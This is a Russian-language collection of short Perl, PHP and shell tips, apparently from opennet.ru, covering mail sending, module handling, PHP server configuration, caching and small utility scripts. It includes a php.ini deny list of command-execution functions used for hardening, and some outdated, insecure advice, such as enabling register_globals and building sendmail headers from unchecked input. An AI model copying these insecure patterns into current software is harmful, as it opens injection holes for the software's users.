use MIME::Lite; $msg = MIME::Lite->new( To =>'you@yourhost.com', Subject =>'HTML with in-line images!', Type =>'multipart/related'); $msg->attach(Type => 'text/html', Data => qq{ <body>Here's <i>my</i> image:<img src="cid:myimage.gif"></body> }); $msg->attach(Type => 'image/gif', Id => 'myimage.gif', Path => '/path/to/somefile.gif'); $msg->send();

Как кодировать/декодировать на Perl содержимое полей в Quoted Printable [комментарии]

use MIME::Words qw(:all); $decoded = decode_mimewords('Subject: =?KOI8-R?Q?=D4=C5=D3=D4?='); $encoded = encode_mimeword("тест", "q", "koi8-r"); $encoded = encode_mimewords("Subject: тест", Charset=> 'koi8-r', Encoding => 'q'); # для base64, вместо "q", написать "b".

Как отправить письмо с аттачем (доп. ссылка 1) [комментарии]

модуль Mime::Lite

Как отправить почтовое сообщение из Perl скрипта [обсудить]

$cmd_mail="/usr/sbin/sendmail -t"; open (SENDMAIL, "|$cmd_mail") || die "ERROR: Can not run sendmail"; print SENDMAIL "MIME-Version: 1.0\n"; print SENDMAIL "Content-Type: text/plain; charset=\"koi8-r\"\n"; print SENDMAIL "Content-Transfer-Encoding: 8bit\n"; print SENDMAIL "To: $to_email\n"; print SENDMAIL "From: Nobody <nobody\@$localhost>\n"; print SENDMAIL "Subject: $subject\n\n"; print SENDMAIL $message . "\n"; close (SENDMAIL);

Функции и модули в Perl

Развертывание локального Perl-репозитория CPAN (доп. ссылка 1) Автор: xenos8 [комментарии]

Инструкция по созданию локального репозитория Perl-модулей, записанных на переносной носитель. Устанавливаем модуль CPAN::Mini: # perl -MCPAN -e "install CPAN::Mini" или для Debian/Ubuntu: sudo apt-get install libcpan-mini-perl или для Fedora/RHEL/CentOS: sudo yum install libcpan-mini-perl Если все зависимости удовлетворяют модулю, то установка пройдет без проблем. На следующей стадии загружаем копию репозитория на сменный носитель (загружается около 1 Гб данных): # minicpan -l /media/Носитель/CPAN/ -r http://mirror.eunet.fi/CPAN/ где, в качестве аргумента к опции "-l" указан путь локального репозитория, а для "-r" - сайт репозитория (выбирайте наиболее близкий к вашему месторасположению зеркала). Для обновления версий модулей в репозитории достаточно запустить такую же команду еще раз. После завершения загрузки всех модулей, приступаем к созданию веб-сервера, для этого устанавливаем apache sudo apt-get install apache или yum install apache Для экономии места вместо копирования всех файлов на сервер, можно просто создать символическую ссылку: ln -s /media/Носитель/CPAN/ /var/www/CPAN/ С этих пор любой запрос к /var/www/CPAN/ будет отправляться к /media/Носитель/CPAN/. Осталась последняя фаза настройки клиента: # perl -MCPAN -e shell cpan[1]>o conf urllist push http://localhost/CPAN/ cpan[2]>o conf commit cpan[3]>quit

Как в Perl перехватить __DIE__, чтобы это не отразилось на die() внутри eval (доп. ссылка 1) [обсудить]

Если в скрипте используется свой обработчик $SIG{__DIE__}, то он отработает и для die() внутри eval блока. Чтобы этого не произошло, нужно вначале eval блока переключиться на старый обработчик: eval { local $SIG{__DIE__} = 'DEFAULT'; local $SIG{__ALRM__} = sub { die 'timeout!' }; alarm(1); .... }; Простейший вариант, проверка $^S, устанавливается в 1 при вызове из eval блока: local $SIG{'__DIE__'} = sub { die @_ if $^S; ..... } Усложненный вариант: sub _evalling { # Определение типа текущей подпрограммы my $i = 0; my $sub; while (defined($sub = (caller($i++))[3])){ if ($sub =~ /^$eval( \d+)?$$/){ return 1; } } return 0; } $::SIG{'__DIE__'} = sub { # Перехват die() &{$self->{callback}}(@_ ? @_ : $@) unless _evalling; die @_; };

Как интегрировать функцию написанную на C/C++ в Perl скрипт. (доп. ссылка 1) [обсудить]

Простой путь: use Inline::C, use Inline::CPP (есть также модуль Inline::ASM) Более сложный путь: perldoc perlxs, perldoc perlxstut

Как получить список всех установленных Perl модулей и их версий (доп. ссылка 1) [обсудить]

use ExtUtils::Installed; $installed = ExtUtils::Installed->new(); foreach $module ($installed->modules()){ printf "Module: %s\t\tVersion: %s\n", $module, $installed->version($module); }

Как выполнить в Perl свой код перед аварийным завершением по die(). [обсудить]

sub die_sig{ # Случай вызова die в eval блоке. die @_ if $^S; # Удаляем лок. unlink("$cfg_lock_file"); } local ($SIG{__DIE__}) = \&die_sig;

Как получить имена подпрограмм Perl модуля (доп. ссылка 1) Автор: whirlwind.ru [обсудить]

print join("\n",&get_sub_list); sub go{} sub test1{} package sublist; sub main::get_sub_list{ no warnings; my ($code,@fn); foreach (keys(%main::)){ next unless /^[\w_]/; push(@fn,$_) if eval("defined(*main::$_"."{CODE})"); } use warnings; @fn }

Выполнение функции по ссылке или определенную как строка [обсудить]

$func_link = sub {.......}; &$func_link(1,2,3); test_func sub{.....}; %arr= ("test" => \&test_func); $arr{"test"}=>(1,2,3); $func_str = "print 'test'"; eval("$func_str");

Как вызвать функцию внутри строки [обсудить]

print "текст @{[test_func()]} текст";

Как передать файловый дескриптор в качестве параметра функции [обсудить]

sub test{ my $handle = shift; while (<$handle>){ ..... }; print {$handle} "test\n"; } open (FH, "<file"); flock(FH, 1); test(*FH);

Как создать модуль и экпортировать переменные [обсудить]

package Test; use Exporter; @ISA = ('Exporter'); @EXPORT_OK = ('test_func'); sub test_func { ...... } 1;

Как поставить обработчик вызываемый при аварийном завершении скрипта [обсудить]

sub my_die{ ..... } local ($SIG{__DIE__}) = \&my_die; local ($SIG{__WARN__}) = \&my_warn; local ($SIG{INT}) = \&my_kill; local ($SIG{TERM}) = \&my_kill; die "test";

PHP

Regex (регулярные выражения)

Конструкции языка и функции

Серверная часть и интерпретатор

Добавление Spreadsheet/Excel/Writer.php в PEAR под Ubuntu 10.10 Автор: btr [комментарии]

При работе с форматом Excel в PHP в логах возникает такая ошибка PHP Fatal error: require_once(): Failed opening required 'Spreadsheet/Excel/Writer.php' Решение проблемы: sudo pear install OLE channel://pear.php.net/OLE-1.0.0RC1 sudo pear install channel://pear.php.net/Spreadsheet_Excel_Writer-0.9.2 channel://pear.php.net/Spreadsheet_Excel_Writer-0.9.2

Ведение полного лога почтовых отправлений, произведенных через PHP скрипты [обсудить]

В PHP 5.3 добавлена поддержка ведения полного лога всех почтовых отправлений через функцию mail(). Указав в ini-файле опцию "mail.log имя_файла", в заданным файл будут сохранены данные от какого пользователя, из какого скрипта, и из какой строки этого скрипта была инициирована отправка каждого письма. При указании опции "mail.add-x-header true" в отправляемые через PHP функцию mail() письма будет добавлен заголовок X-PHP-Originating-Script с информацией об скрипте и отправителе.

Ускорение форума phpBB при помощи memcached (доп. ссылка 1) Автор: EugeneVC [комментарии]

Решение по кэшированию повторяющихся запросов к MySQL, для оптимизации работы форума phpBB. Устанавливаем memcached под Debian или Ubuntu: apt-get install memcached php5-memcached После установки не забываем перезагрузить apache или php-cgi. Чтобы php увидел новые модули. Включаем лог медленных запросов у mysql: log_slow_queries = /var/log/mysql/mysql-slow.log long_query_time = 3 и ждем с часик, после чего смотрим лог. У меня в лог попало порядка 4000 запросов - из них легко было выделить запросы типа: SELECT COUNT(user_id) AS total FROM phpbb_users WHERE user_id <> -1 Запрос постоянно подсчитывал количество пользователей форума на phpBB. Понятно, что это число не особо важно - это просто статистика. Значит данные по этому запросу можно закешировать часа на 2. Для этого открываем файл includes/functions.php ищем функцию get_db_stat() находим код: if ( !($result = $db->sql_query($sql)) ) { return false; } $row = $db->sql_fetchrow($result); изменяем на $memcached = new Memcache; $memcached->connect('localhost', 11211); if(!$row = $memcached->get($sql)) { if ( !($result = $db->sql_query($sql)) ) { return false; } $row = $db->sql_fetchrow($result); $memcached->set($sql, $row, MEMCACHE_COMPRESSED, time() + 7200); } $memcached->close(); Смысл изменения состоит в том, что в memcached данные хранятся парами (ключ, значение). Ключом служит SQL запрос - он уникальный. Алгоритм приведенного кода состоит в следующем: соединяемся с memcached, смотрим если такие данные по ключу, если нет только тогда дергаем базу, если есть - то идем дальше - не посылая на базу никаких запросов. Надеюсь экономия всем понятна. Немного о грустном - модов для phpBB + memcache я не нашел. Зато в phpbb3 эта поддержка заявлена. А для phpBB2 придется самому выискивать такие запросы для кеширования, а ведь еще есть моды - они тоже генерируют тяжелые запросы. Если все сделать правильно - тормоза базы можно сократить в 2-3 раза.

Средство против роботов публикующих спам в формах Автор: Олег Светлов [комментарии]

Избавится от автоматического поста и не напрягать посетителя с вводом графического кода позволит следующий алгоритм: # Антиробот - против автопостов # function antibot($text) { $text = substr($text, 1, -4); $sear = array("'1'i","'2'i","'3'i","'4'i","'5'i","'6'i","'7'i","'8'i","'9'i","'0'i"); $repl = array("a","b","c","d","e","f","g","h","i","j"); $text = preg_replace ($sear, $repl, $text); return $text; } /* // вставляем анти-робоспам $antitime = time(); $antiname = antibot($antitime); echo '<input name="'.$antiname.'" type="hidden" value="'.$antitime.'">'; #---------- // проверяем анти-робоспам $ver1time = time(); $ver2time = time()-'9999'; $ver1name = antibot($ver1time); $ver2name = antibot($ver2time); if ((strip_tags($_POST[$ver1name])<$ver1time and strip_tags($_POST[$ver1name])>$ver2time) or (strip_tags($_POST[$ver2name])<$ver1time and strip_tags($_POST[$ver2name])>$ver2time)) { $antibot = '1'; // антибот даёт добро на post } else { $antibot = '-1'; // антибот запрещает этот post } */ PS: в функции "замена цифры на буквы" обязательно замените a-j на что-нибудь своё. PPS: Код успешно работает около двух лет на нескольких сайтах.

В чем может быть причина битых бинарных файлов на выходе PHP [комментарии]

Например, если в результате выполнения функции (например, base64_encode($buffer)) на выходе получается битый файл (кавычки, \ и символ с нулевым кодом экранированы символом \), то проблема в использовании директив автоматического экранирования magic_quotes_gpc (get, post, cookie) или magic_quotes_runtime (автоэкранирования в некоторых функциях) в php.ini. Для решения проблемы нужно использовать функцию stripslashes, например: base64_encode(stripslashes($buffer))

Можно ли скрыть исходный код при распространении php-скрипта (доп. ссылка 1) [комментарии]

Существует утилита шифрования php скриптов - acak-php. Скрипты выполняются в зашифрованном виде.

Можно ли выполнить SSI директивы в PHP скрипте. [обсудить]

Используете функцию virtual() для парсинга shtml внутри php. Для вызова php из shtml достаточно

Regex (регулярные выражения)

Как проверить что переменная является числом. [комментарии]

if (ereg("^[0-9]+$", $var)) { число }

Использование Perl regex в PHP [обсудить]

preg_match("/маска/", $строка, [массив]) preg_replace("/маска/", "/на что менять (параметры \\1, \\2 ...)/", $строка); preg_grep("/маска/", $массив) - на выходе все элементы массива соответствующие маске. if (preg_match ("/\<\/a\>/i", $str)){ ... } preg_match("/^([^:]*)\:(.*)/", $str, $array); list($var1,$var2) = $array;

Как автоматически все ссылки в виде http://www инкапсулировать в a href ? [обсудить]

eregi_replace("([[:alnum:]]+)://([^[:space:]]*)([[:alnum:]#?/&=])", "<a href=\"\\1://\\2\\3\">\\1://\\2\\3</a>", $var);

Что лучше preg_* или ereg_* [комментарии]

Старайтесь при работе с регулярными выражениями всегда когда это возможно использовать preg, эта функция выполняется на порядок быстрее ereg.

Как развить непрерывный текст на строки не разрывая слов [комментарии]

$per_line=80; - число символов в строке. echo preg_replace("/^(.{".$per_line."}\S*)/m","\\1\n", $text);

Конструкции языка и функции

Как проверить что переменная является числом. [комментарии]

if (ereg("^[0-9]+$", $var)) { число }

Ускорение get_browser() в PHP (доп. ссылка 1) Автор: kornel [комментарии]

В PHP есть очень удобная для разного рода статистики машин функция - get_browser(). Она возвращает по юзерагенту объект, содержащий отфильтрованный набор информации о браузере и его системе, как то имя, платформа, версия и т.п. "Т.п." - это набор информации, о поддержке кук, дотнета и еще кучи всего, мне не нужного. Недавно заметил, что при большом количестве обращений эта функция довольно медленная и ресурсоемкая. Как положено, полез на http://www.php.net/get_browser читать, что пишут в комментариях. Первое, что попробовал, перейти на облегченную версию browscap.ini... Помогло... процентов на 5 frown.gif В коментах нашел Browser Capabilities PHP Project. По заявлениям автора одни из основных фитч - быстрота и полная совместимость с get_browser(). Мне так-же понравилось автоматическое обновление browscap.ini. С совместимостью оказалось не все гладко. Если у get_browser() все свойства написаны строчными, то у данного проекта их названия пишутся с большой буквы, следовательно совместимость не полная. Но, это не самая большая проблема и легко обходится. Но вот со скоростью всплыли неожиданные проблемы. Даже после накопления кеша производительность не увеличилась и осталась на уровне get_browser() Для себя решил эту проблему след. образом: таблица в mysql: CREATE TABLE `bc_cache` ( `cache_id` bigint(16) unsigned NOT NULL auto_increment, `hash` char(32) NOT NULL default '', `browser` char(32) NOT NULL default '', `version` char(32) NOT NULL default '', `platform` char(32) NOT NULL default '', PRIMARY KEY (`cache_id`), UNIQUE KEY `hash` (`hash`) ) Код в PHP примерно такой: $ua_hash = bin2hex(mhash(MHASH_MD5,$_SERVER['HTTP_USER_AGENT'])); $query = sprintf("select browser,version,platform from bc_cache where hash='%s'",$ua_hash); $data = mysql_query($query,$res); if (mysql_num_rows($data)) { $browser = mysql_result($data,0,'browser'); $version = mysql_result($data,0,'version'); $platform = mysql_result($data,0,'platform'); } else { $bc = get_browser($useragent); $browser = $bc->browser; $version = $bc->version; $platform = $bc->platform; $query = sprintf("insert into bc_cache (hash,browser,version,platform) values ('%s','%s','%s','%s')", $ua_hash, $browser, $version, $platform); mysql_unbuffered_query($query); } В дальнейшем пользуюсь переменными $browser,$version и $platform как мне заблагорассудится. Результат - повышение производительности, на глаз, раза в 4-8. Почему? За счет того, что $_SERVER['HTTP_USER_AGENT'] хоть и может сильно различаться, но всё-таки, вещь не самая уникальная. А select по уникальному индексу по char(32) отрабатывает очень быстро!

Как подавить вывод ошибок при вызове функции на PHP [комментарии]

Если перед именем вызываемой функции поставить @, то ошибки выводится не будут.

Как в Perl/PHP выводить данные без буферизации, не дожидаясь конца строки [комментарии]

Perl: "$!=1;" или "use IO::Handle; FH->autoflush(1);" PHP: После каждой операции вывода вызывать flush();

Как в PHP определить константу. [обсудить]

define("CONST_VAL", "TEST"); $var = CONST_VAL;

Серверная часть и интерпретатор

Как запустить PHP скрипт без встроенного в apache модуля и под UID определенного пользователя [комментарии]

Собираем PHP как скрипт и пишем в .htaccess: AddType application/x-httpd-php .php Action application/x-httpd-php /cgi-bin/php.cgi

Подключаем PHP 7.1 к Oracle в CentOS 7 Автор: smolindm [комментарии]

Скачиваем и устанавливаем Oracle Instant Client для linux с официального сайта. Устанавливаем Instant Client: # rpm -ivh oracle-instantclient12.1-basic-12.1.0.2.0-1.x86_64.rpm # rpm -ivh oracle-instantclient12.1-devel-12.1.0.2.0-1.x86_64.rpm Указываем системе где лежат библиотеки Oracle иначе получим предупреждение вида: PHP Warning: PHP Startup: Unable to load dynamic library '/usr/lib64/php/modules/oci8.so' -libclntsh.so.12.1: cannot open shared object file: No such file or directory in Unknown on line 0 PHP Warning: PHP Startup: Unable to load dynamic library '/usr/lib64/php/modules/pdo_oci.so' -libclntsh.so.12.1: cannot open shared object file: No such file or directory in Unknown on line 0 создаем и записываем в конфигурационный файл путь к библиотекам Oracle # echo /usr/lib/oracle/12.1/client64/lib >> /etc/ld.so.conf.d/Oracle12.conf после чего настраиваем привязку динамических ссылок при помощи ldconfig # ldconfig Проверяем, что php не выдает ошибок: # php -v PHP 7.1.0RC6 (cli) (built: Nov 9 2016 09:51:59) ( NTS ) Copyright (c) 1997-2016 The PHP Group Zend Engine v3.1.0-dev, Copyright (c) 1998-2016 Zend Technologies В нашем случае все в порядке, можно смело обращаться из php к Oracle.

Решение проблемы поддержки php-zip-extension в Fedora-16 Автор: kassy_k [комментарии]

При установке PHP из стандартного репозитория обнаруживается отсутствие поддержки php-zip-extension. Как следствие, такие продукты как Moodle 2.2 не запускаются на сервере. Данная проблема актуальна для некоторых пользователей дистрибутивов Fedora 15 и Fedora 16. Решение проблемы довольно просто. Потребуется проделать несколько нехитрых операций: 1. Устанавливаем из репозитория Apache, PHP и необходимые расширения. 2. Загружаем и распаковываем с официального сайта исходники PHP (например в /dist). 3. Создаем на веб-сервере файл inf.php: <?php phpinfo(); ?> Так проще всего набрав в браузере http://localhost/inf.php посмотреть как сконфигурирован PHP в репозитории. 4. Переходим в каталог с исходниками PHP и выполняем скрипт ./configure почти со всеми полученными на предыдущем шаге опциями, но добавляем еще --enable-zip 5. Переходим в каталог /dist/php-X.X.X/ext/zip и выполняем следующее: phpize ./configure make sudo make install или устанавливаем через создание пакета, вместо make install: sudo checkinstall 6. Финиш. Получаем установленный shared-модуль zip.so 7. Перезапускаем веб-сервер: sudo systemctl restart httpd.service

Отладка php скриптов на стороне сервера Автор: Pavel Piatruk [комментарии]

Иногда пользовательские скрипты или зависают, или хотят соединиться с чем-то запрещенным в файрволе, или интерпретатор неожиданно вылетает, не передав заголовок Content-type, что приводит к ошибке 500. Для того, чтобы разобраться в причине, попробуем отладить скрипты со стороны сервера, не залезая в код php. Сначала придется изменить конфигурацию apache, чтобы php работало через suphp, а не через модуль mod_php5. Я не буду рассказывать, как это делается. Главное, кроме обычного, "неотладочного", надо добавить свой обработчик в suphp.conf: x-httpd-php_debug=php:/usr/local/bin/php-cgi.sh А вот содержимое этого скрипта /usr/local/bin/php-cgi.sh. Поставьте ему права 755. Видно, что он запускает отладчиком php с перенаправлением отладочной информации в файл. #!/bin/bash /usr/bin/strace /usr/bin/php5-cgi $@ 2>/tmp/debug Не забудьте добавить этот обработчик в конфиг apache , это делается строкой suPHP_AddHandler x-httpd-php_debug Затем в .htaccess нужного сайта допишите AddHandler x-httpd-php_debug .php В результате после повторной загрузки сайта появится файл /tmp/debug, в который будет добавляться отладочная информация о работе php нужного сайта. В это время лучше ограничить посещение сайта, разрешив только 1 IP адрес, чтобы отладочной информации не было чрезмерно. Обычно будет достаточно имени системного вызова, который приводит к прекращению выполнения скрипта. Можно поиграться с параметрами strace.

Как совместить использование SuPHP и mod_php в одном apache (доп. ссылка 1) Автор: pookey.co.uk [обсудить]

По умолчанию будет использоваться SuPHP. В httpd.conf: LoadModule suphp_module modules/mod_suphp.so LoadModule php4_module modules/libphp4.so AddType application/x-httpd-php .php AddType application/x-httpd-php-source .phps AddHandler x-httpd-php .php suPHP_Engine on php_admin_flag engine off Для избранных хостов активируем mod_php: <VirtualHost ..> suPHP_Engine off RemoveHandler .php php_admin_flag engine on ... </VirtualHost>

Как оптимизировать работу сайта на PHP не переписывая скрипты (доп. ссылка 1) Автор: onorua [комментарии]

Мы взяли 2 абсолютно одинаковых по-железу компьютера, один сделали точной копией настроек "живого" сервера (пускай будет машина А), а второй пытались тюнить (Машина Б). Каждый текст проводился отдельно (за раз - одна оптимизация, без наложения). 1. На Б было проставлен весь новый софт с настройками по-умолчанию: А - 86 ответов/секунда Б - 72 ответов/секунда 2. Выключен режим апача KeepAlive=off, добавлено количество одновременных запросов в MySQL: А - 86 о/с Б - 81 о/с 3.1 Добален модуль php accelerator (http://www.php-accelerator.co.uk/) А - 87 о/с Б - 93 о/с 3.2 Код скомпилен с помощью Zend, и подгружен Zend Optimizer (http://www.zend.com/store/products/zend-optimizer.php): A - 86 о/с Б - 140 о/с 3.3 Код скомпилен MMcache (лучший результат) (http://turck-mmcache.sourceforge.net/index_old.html) A - 86 о/с Б - 215 о/с Тест проводился с помощью родного бэнчмарка апача. Мы были слегка удивлены тем что Зенд не оправдал надежды + при компилировании Zend'ом, в админке не отображаются картинки.

Как отдавать web-контент в сжатом виде средствами PHP (доп. ссылка 1) [обсудить]

mod_php должен быть собран с опцией --with-zlib. Метод 1: output_buffering = On output_handler = ob_gzhandler zlib.output_compression = Off Метод 2: output_buffering = Off output_handler = zlib.output_compression = On

Как запретить пользователю использовать в своих скриптах определенные PHP функции [комментарии]

В php.ini (в httpd.conf не работает, только в php.ini): disable_functions=system,exec,passthru,shell_exec,mysql_pconnect, pgsql_pconnect, proc_open,proc_close,dl,show_source

Как организовать выполнение php скриптов под UID текущего пользователя (доп. ссылка 1) [комментарии]

Метод 1. Собираем PHP с --enable-force-cgi-redirect, кладем php.cgi в cgi-bin, в httpd.conf: AddType application/x-httpd-php .php Action application/x-httpd-php /cgi-bin/php.cgi Метод 2. Собираем PHP c --enable-discard-path, в начало php скриптов добавляем #!/usr/bin/php В httpd.conf: AddHandler cgi-script .php и в параметры директории где php скрипты к Options добавляем ExecCGI.

Почему после установки PHP 4.2.x перестали работать все глобальные переменные. [комментарии]

В /etc/php.ini необходимо прописать: register_globals on

Как максимально ограничить пользовательские PHP скрипты. [обсудить]

В httpd.conf в блок конфигурации каждого виртуального хоста добавляем: php_admin_flag engine on php_admin_flag expose_php off php_admin_flag safe_mode on php_admin_flag track_vars on php_admin_flag allow_url_fopen off php_admin_flag magic_quotes_runtime on php_admin_value doc_root /home/user/htdocs php_admin_value open_basedir /home/user/htdocs php_admin_value safe_mode_exec_dir /home/user/bin php_admin_value safe_mode_protected_env_vars LD_LIBRARY_PATH php_admin_value safe_mode_allowed_env_vars PHP_ php_admin_value upload_tmp_dir /home/user/htdocs/tmp php_admin_value upload_max_filesize 1024000 php_admin_value max_execution_time 10 php_admin_value post_max_size 1M php_admin_value memory_limit 8M php_admin_flag mysql.allow_persistent off php_admin_value mysql.max_links 5 php_admin_flag pgsql.allow_persistent off php_admin_value pgsql.max_links 5 # в php.ini disable_functions =

Shell

Готовые скрипты

Устранение ошибки redirection unexpected в bash-скриптах Автор: Аноним [комментарии]

На системе с bash 5.2.15(1)-release совершенно невинное выражение read id rest < <(qm list) вызывает ошибку "Syntax error: redirection unexpected" Лечится заменой shebang с #!/bin/bash на #!/usr/bin/bash Вроде бы потому, что whois bash отдаёт /usr/bin/bash. Но ирония в том, что /bin/bash и /usr/bin/bash - две идентичные копии, даже не симлинк. /usr/bin в PATH стоит перед /bin.

Случайная задержка в shell-скрипте, выполняемом из crontab (без башизмов) Автор: john_erohin [комментарии]

применимо в системах без anacron, без /etc/cron.[hourly|daily|weekly|monthly] и без systemd. цель: чтобы вписать простую строку в crontab вида 0 */8 * * * $HOME/bin/script.sh но при этом иметь случайное начало работы (а не ровно 00:00, 08:00 и 16:00), в начале script.sh нужно поместить R0=`dd if=/dev/urandom bs=1 count=4 status=none | od -t u4 | head -1 | cut -c 8-` sleep `echo "scale=0;" $R0 % 3601 | bc` задержка будет случайная, равномерно распределённая в интервале от 0 до 3600 секунд.

Просмотр прогноза погоды из терминала (доп. ссылка 1) Автор: igor_chubin [комментарии]

Чтобы просмотреть информацию о погоде из командной строки, можно обратиться к службе wttr.in (код сервиса открыт под лицензией Apache 2.0) с помощью curl или другой аналогичной программы: $ curl wttr.in Weather report: Moscow, Russia \\ / Partly cloudy _ /"".-. 4 - 8 °C \\_( ). -> 26 km/h /(___(__) 10 km 0.0 mm Для просмотра информации о погоде в текущем городе или с указанием города (и при необходимости страны через запятую) для просмотра информации в другом городе: $ curl wttr.in/Minsk $ curl wttr.in/Odessa,Ukraine Кроме названий городов для указания местоположений могут использоваться: 1. IP-адреса (четыре октета разделённых точкой); 2. Доменны имена (@opennet.ru); 3. GPS-координаты (два числа через запятую); 4. Слова для поиска (начинается с ~: ~Eiffel+tower); 5. Коды аэропортов (svo, dme, muc и т.д.). Прогноз погоды можно просматривать как в командной строке (с помощью curl, httpie или другой подобной программы) так и в браузере. Прогноз погоды так же может быть предоставлен в виде PNG файла. Опции Дополнительные опции, регулирующие количество дней в прогнозе, единицы измерения, вывод дополнительных данных и другие параметры задаются после вопросительного знака в строке запроса: $ curl wttr.in/San-Francisco?u (для просмотра прогноза с использованием системы мер USCS). Полный список доступных опций можно посмотреть на странице /:help: $ curl wttr.in/:help PNG-вывод и маркировка фотографий Если добавить к концу запроса суффикс ".png", то сервис предоставит прогноз погоды в виде PNG-файла (который будет выглядеть как вывод cURL в терминале). Этот режим можно использовать в нескольких случаях: 1. Для просмотра погоды в браузере, в котором некорректно поддерживаются моноширинные Unicode-шрифты (главным образом старые Windows-браузеры); 2. Для непосредственного использования в web-страницах (файл можно непосредственно встраивать в страницу c помощью <img src="http://wttr.in/Moscow.png"/>. 3. Для добавления информации о погоде на фотографии: $ convert 1.jpg < ( curl wttr.in/Oymyakon_tqp0.png ) -geometry +50+50 -composite 2.jpg В этом примере к фотографии 1.jpg добавится погода в данный момент в Оймяконе и результат будет записан в 2.jpg. Локализация и интернационализация wttr.in переведён на более чем 40 языков народов мира в том числе на русский, украинский и некоторые другие языки бывших союзных республик. Выбор языка вывода определяется автоматически на основе заголовков HTTP (Accept-Language) или может быть задано с помощью параметра lang: $ curl wttr.in/Moscow?lang=ru Поддерживаются не только различные языки вывода, но и различные языки запросов (они должны быть в кодировке UTF-8). Например, такие запросы будут работать: $ curl wttr.in/станция+Восток $ curl wttr.in/Килиманджаро $ curl wttr.in/Северный+полюс и тому подобные. Это очень важно, поскольку далеко не все населённые пункты (и места) на земном шаре имеют англоязычное название. Для входных запросов поддерживается не только русский, но и любые другие языки. Новые функции и исходный код Сервис wttr.in постоянно развивается. Информация о новых функциях публикуется в твиттере главного разработчика проекта - https://twitter.com/igor_chubin и в репозитрии проекта: https://github.com/chubin/wttr.in Другие способы определения погоды в командной строке Службы: $ finger newyork@graph.no Программы: * wego (нужно ключ доступа к API) - используется для визуализации прогноза погоды в wttr.in; * weatherpy (нужен ключ доступа к API погоды); * inxi (например: inxi -W Warsaw,Poland). Другие популярные сервисы для командной строки Число известных сервисов для терминала и командной строки сейчас насчитывает несколько десятков, и оно постоянно растёт: awesome-console-services Популярные сервисы для командной строки можно разделить на несколько групп:
IP-адреса и определение местоположения;
Размещение текста в интернете, клоны pastebin (ix.io, sprunge.us, ptpb.pw);
Доступ к файлам (transfer.sh);
Генерация текста и сообщений (whatthecommit.com, fooas.com)
Словари и переводчики;
Прочие службы (погода, игры и так далее).

Скрипт для наглядного ping с ведением лога Автор: Kins [комментарии]

Представленный скрипт может: * Отображать результат пинга * Отображать время пинга * Вести лог пингов * Визуализировать лог пингов * Подавать звуковой сигнал при отсутствии пинга Код скрипта conky.sh: #!/bin/bash #$1 - name #$2 - adress #$3 - options (f: format result, n: show name, t: show time, d: show colored dot, s: play sound, l: logging) #$4 - width in symbol #$5 - fill symbol #$6 - sound file #$7 - packetsize if [ "$7" != "" ] then tmp=-s' '$7 fi a=$(ping -c 1 $2 -W 1 $tmp) if [ "$a" = "" ] then r='e' t=Ꝏ fi if [[ "$a" =~ [0-9]*% ]]; then tmp=$BASH_REMATCH; fi if [ "$tmp" = "0%" ] then r='y' if [[ "$a" =~ time=[0-9.]*.ms ]]; then t=$BASH_REMATCH; fi t=${t#time=} t=${t% ms} elif [ "$tmp" = "100%" ] then r='n' t=Ꝏ fi vislog='' #функция визуализации и ведения лога function vis_log { # Проверка наличия файла. if [ ! -f "$2" ] then #echo "Файл "$2" не найден. Создаем..." > $2 fi #сколько строк лога нужно визуализировать? tmp='' if [[ "$3" =~ n ]]; then tmp=$1' '; fi if [[ "$3" =~ t ]]; then tmp=$tmp' '$t; fi if [[ "$3" =~ d ]]; then tmp=$tmp' '$r; fi cnt=${#tmp} let cnt=$4-$cnt #считать из лога нужное количество строк tmp=$(tail -n $cnt $2) #парсим считанные строки sym='' oldsym='' for ((i=1; i <= cnt ; i++)) do if [[ "$tmp" =~ [eyn] ]]; then sym=$BASH_REMATCH; fi tmp=${tmp#*d} if [ "$sym" != "$oldsym" ] then case "$sym" in y) vislog=$vislog'${color green}';; n) vislog=$vislog'${color red}';; e) vislog=$vislog'${color yellow}';; esac fi oldsym=$sym vislog=$vislog$5 done #записали новый результат пинга в лог echo "$r $t"$(date +%x' % '%X)' d' >> $2 #типа ротация лога оставляем только последние $4 строк tail -n $4 $2 > temp.txt rm $2 mv temp.txt $2 } #сыграем звук если надо if [[ "$3" =~ s ]]; then if [ "$r" != 'y' ] then play $6 -q & fi; fi #окончательное оформление для conky res='' if [[ "$3" =~ l ]]; then vis_log $1 $2 $3 $4 $5; fi if [[ "$3" =~ n ]]; then res=$1' '; fi if [[ "$3" =~ f ]]; then res=$res' '$vislog; fi if [[ "$3" =~ t ]]; then res=$res'${color} '$t; fi r=${r//y/'${color 00ff00}'⬤} r=${r//n/'${color ff0000}'⬤} r=${r//e/'${color ffff00}'⬤} if [[ "$3" =~ d ]]; then res=$res' '$r; fi echo $res В скрипт надо передать 7 параметров: 1- Отображаемое имя того, что пингуем (может не совпадать с адресом и вообще это просто строка от которой работа скрипта не зависит) 2- Пингуемый адрес (х.х.х.х либо example.com) 3- Флаги настроек: f - форматировать вывод (без флага ведения лога бессмысленно) n - отображать имя t - отображать время пинга (ms) d - отображать жирную точку текущего результата s - проиграть звук при отсутствии пинга l - вести лог 4- Общая ширина строки в символах для форматирования 5- Символ которым будет заполняться пространство для форматированного вывода, также цветом этого символа будет отображаться лог 6- Имя звукового файла (необязательный параметр нужен для флага s, почему то путь у меня не работал пришлось файл бросить в домашний каталог) 7- Длинна пакета для пинга (совсем не обязательный параметр, но очень просили) Пример конфигурации conky: {execpi 10 /home/kinsoft/conky_ping5.sh Inet 8.8.8.8 fntdls 32 . drip.ogg} отображать имя, время пинга, лог, текущий результат; играть звук; вести лог; форматировать строку и делать ее шириной 32 знака.

Выполнение действия при изменении или создании файла в Linux [комментарии]

Утилита inotifywait из состава пакета inotify-tools позволяет организовать выполнение определенного действия в shell скрипте, при изменении, создании, удалении, перемещении и выполнении других операций с файлами. Выполняем программу при появлении нового файла в директории inotifywait -e create /home/ftp/incoming --format "%w%f" -q -m| while read file; do clamscan $file done Для отслеживания изменений вместо create можно использовать modify, удаления - delete, перемещения - move и т.п.

Шаблонизатор на shell (доп. ссылка 1) Автор: Denis Nasyrtdinov [комментарии]

